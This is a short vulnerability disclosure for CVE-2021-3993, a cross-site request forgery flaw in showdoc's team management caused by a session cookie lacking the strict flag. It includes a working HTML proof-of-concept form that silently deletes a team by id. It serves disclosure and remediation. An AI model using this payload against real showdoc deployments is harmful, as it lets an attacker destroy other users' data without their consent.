Headline
CVE-2021-3993: Cross-Site Request Forgery (CSRF) in showdoc
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
Description
You set the strict
flag only for one of your cookies named cookie_token
but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID
don’t have strict
flag.
Proof of Concept
1.replace 38046
with the team id
2.open poc.html and click on submit button.
3.after that the team with id 38046
or your replaced team id will be deleted.
//poc.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
<input type="hidden" name="id" value="38046" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Occurences